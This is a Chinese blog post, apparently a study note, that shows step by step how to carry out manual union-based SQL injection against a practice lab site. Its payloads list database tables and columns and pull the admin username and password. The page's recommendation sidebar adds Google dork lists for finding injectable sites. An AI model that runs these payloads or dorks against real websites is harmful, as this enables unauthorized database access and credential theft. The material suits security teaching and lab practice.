【SQL注入】 sql注入中的union和limt关键字的使用解析

最新推荐文章于 2024-05-20 11:12:07 发布
最新推荐文章于 2024-05-20 11:12:07 发布
阅读量3k 收藏 1
点赞数
分类专栏: 渗透学习记录 学习过程 文章标签: sql web安全 网络安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58822763/article/details/124267269
版权

【SQL注入】 sql注入中的union和limt关键字的使用解析

我将用测试靶场做演示,拿下网站数据库来向你展示sql注入全过程和思路

一、首先要找到注入点
[http://rhiq8003.ia.aqlab.cn/?id=1]

二、判断是否存在sql注入漏洞

构造and 1=1/and 1=2查看页面是否有异常,若有异常,即有可能存在注入,还可通过该语句判断该站点是否有WAF

三、查询当前表的字段数

**构造order by x,当页面返回异常时,利用x减一即可得到当前表的字段数。 **

四、查询显错点

构造and 1=2 union select 1,2,3,若页面显示了我们构造的1,2,3,则对应的字段即为显错点。

五、使用union和limt关键字获取网站全部数据

第一个表admin

and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1

字段1id

and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 0,1

字段2username

and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 1,1

字段3password

and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 2,1

获取用户名

and 1=2 union select 1,username from admin limit 0,1

获取密码

and 1=2 union select 1,password from admin limit 0,1

第二个表dirs

and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 1,1

字段1paths

and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘dirs’ limit 0,1

第三个表news

and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 2,1

字段1id

and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘news’ limit 0,1

字段2content

and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘news’ limit 1,1

第四个表xss

and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 3,1

字段1id

and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘xss’ limit 0,1

字段2user

and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘xss’ limit 1,1

字段3pass

and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘xss’ limit 2,1

fuqinderen1
关注
专栏目录
SQL注入关键词大全
怪兽的博客
08-08 3万+
高级搜索关键词 sql 注入大全 拿起你手的 啊D 明小子 pangolin  激情把 inurl:asp?id= inurl:Article_Print.asp? inurl:EnCompHonorBig.asp?id=随便加个数字 inurl:showproduct.asp?id=随便加个数字  inurl:ManageLogin.asp inurl:EnCompH
SQLUnion查询注入
帅醉了的博客
03-03 711
0x00_简介 Union操作符是用于合并两个或者多个select语句的搜索结果集。 在sql注入攻击,要使union成功执行,必须要满足四个条件: 1、与内部数据库具有相同的字段数。 2、列是相同的数据类型。 3、select语句的顺序必须相同。 4、当前页面有回显点。 0x01_Union注入一般步骤 order by 判断字段 查看回显数据位置 读库信息 读表信息 读字段 读数据 0...
整理出来的SQL注入关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
sql注入关键词
designer545的博客
07-12 2271
自己总结的关键词 1、select 2、update 3、delete 4、drop 5、insert 6、where 7、show 8、desc 查看结构/降序排列数据 desc table_name select ename,sal from emp order by sal desc(此处desc 是 descend缩写) 9、alert 选择 alert table 表名 drop column 列名 alert table 表名 add 列名 数据类型 alert table 表名 c
sql注入关键字大全
07-27
sql注入关键字大全,包括sqlserve , odbc,等
sql注入词&语法
热门推荐
fengling132的专栏
07-14 1万+
sql注入关键词脚本小子必看 inurl:asp?id= inurl:Article_Print.asp? EnCompHonorBig.asp?id=随便加个数字 showproduct.asp?id=随便加个数字  inurl:ManageLogin.asp EnCompHonorBig.asp?id= 随便加个数字 inurl: (asp?=数字) inurl: (php?=数
【PTE】SQL注入(一)
HkD01L的博客
11-10 724
CISP-PTE国家注册信息安全渗透测试工程师课程笔记SQL注入 、联合查询注入、二阶注入、报错注入
面试 SQL整理 常见的SQL面试题:经典50题
CSDN_KONGlX的博客
06-16 7916
目录 ​ SQL基础知识整理: 常见的SQL面试题:经典50题 三、50道面试题 2.汇总统计分组分析 3.复杂查询 sql面试题:topN问题 4.多表查询 【面试题类型总结】这类题目属于行列如何互换,解题思路如下: 其他面试题: SQL基础知识整理: select 查询结果 如:[学号,平均成绩:组函数avg(成绩)]from 从哪张表查找数据 如:[涉及到成绩:成绩...
常见的SQL面试题:经典50例
weixin_70730532的博客
08-01 9285
常见面试题分组取每组最大值、最小值,每组最大的N条(topN)记录。
sqli-labs 5、6报错注入通关方式
老夏家的云
01-18 2670
sqli-labs 5、6报错注入通关方式 这篇为了代码行语法高亮好看,就把payloadsql语句之前的内容省去了,复制使用时记得在payload前面加上?id=-1' 第六关闭合方式是双引号,所以将所以payload的单引号改成双引号即可。 这里的思路,利用双查询的报错提示和information_schema库获得数据库信息,思路可见目录。 文章目录sqli-labs 5、6报错注入通关...
利用谷歌搜索SQL注入漏洞关键词
12-16
利用谷歌搜索SQL注入漏洞关键词 目标关键字+inurl:id 英语字母及单词+inurl:id 网站域名+inurl:id 阿拉伯数字+inurl:id inurl:asp?id= inurl:Article_Print.asp? EnCompHonorBig.asp?id=随便加个数字 showproduct.asp?id=随便加个数字 inurl:ManageLogin.asp EnCompHonorBig.asp?id= 随便加个数字 inurl: (asp?=数字) inurl: (php?=数字 等等 里面都有很多。 非常简单好用
网络安全必学SQL注入SQL语句关键词,SQL注入攻击实例分享!!!
logic1001的博客
02-18 1463
当找到某个变量关键词有 SQL 注入风险时,可以再根据调用链找到该存在注入风险的业务逻辑代码,查看参数来源是否安全、是否有配置SQL危险参数过滤的过滤器,最终确认是否存在SQL注入。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…针对SQL注入的攻击行为可描述为通过在用户可控参数注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为。
SQL注入——POST union注入
heyingcheng的博客
03-12 302
4,GET提交有长度限制,最长2048个字符;POST提交没有长度要求,不是只允许使用ASCII字符,还可以使用二进制数据。2,GET提交参数会保留在历史记录,POST提交不会。1,GET提交可以被缓存,POST提交不会。即当网站需要登录时,可以使用POST提交。一般有登录框的都会采用post提交方式。5,POST提交比GET提交更安全
Web安全与防御】简析Sql注入与防御措施
weixin_34280237的博客
10-03 465
引言 最近由于在CSDN上看到许多有关SQL注入问题的文章,以前因为是小白,重在学编程技术上,并没有在程序安全防护上大费周章。但是由于学习的路途越走越远,包括前段时间理工大教务处主页被黑(我同学也在网络工作室负责维护),让我深深的感受到,在Web应用上线之后,除了应付“高并发”之类的效率性问题之外,安全性问题也是非常重要的。俗话说的好,“不防君子防小人...
sql注入大全
Little Luck
01-19 1128
* 确认数据库类型 (只有MYSQL解析/*)1.  and ord(mid(version(),1,1))>51                   /* 确认数据库版本 51是ASCII码3 正确则>4.0 错误则2. union select 1,1,1,****1,1                              /*返回正确 确认字段数3.order by 13      
关于SQL的各种注入
qq_73607577的博客
03-24 1746
SQL注入
网络安全笔记-SQL注入
L120305q的博客
01-16 1875
SQL注入是开发者对用户输入的参数过滤不严格,导致用户输入的数据能够影响预设查询功能的一种技术
个人笔记-渗透测试-SQL注入
最新发布
weixin_48162696的博客
05-20 985
SQL注入原理,sql注入的数据类型,sql注入的提交方式,手工注入,sqlmap,基础防御,
SQL注入.系统数据库information_schema
newlife1441的博客
08-06 480
mysql的系统数据库information_schema,经常利用系统数据库配合union联合查询来获取数据库相关信息,因为系统数据库所有信息都在这个数据库里面,常常被利用的表有TABLES以及存放列相关信息的COLUMNS、还有数据库相关信息的SCHEMATA表📔📓。...
sql server limt
09-08
在MS SQL Server,没有单独的LIMIT语句来实现分页查询。相反,可以使用TOP关键字和ROW_NUMBER()函数来实现相同的功能。 例如,要查询用户名为1的前5条记录,可以使用以下SQL语句: SELECT TOP 5 * FROM browserecord WHERE username = '1'; 这将返回满足条件的前5条记录。 请注意,如果要查询不同的页面,可以结合ROW_NUMBER()函数使用。例如,要查询第6到第10条记录,可以使用以下SQL语句: SELECT * FROM ( SELECT *, ROW_NUMBER() OVER(ORDER BY SomeColumn) AS RowNum FROM browserecord WHERE username = '1' ) AS SubQuery WHERE RowNum BETWEEN 6 AND 10; 其,SomeColumn是用于排序的列名,可以根据实际情况进行调整。这将返回符合条件的第6到第10条记录。 所以,即使MS SQL Server不支持LIMIT语句,但使用TOP关键字和ROW_NUMBER()函数,我们仍然可以实现分页查询的功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值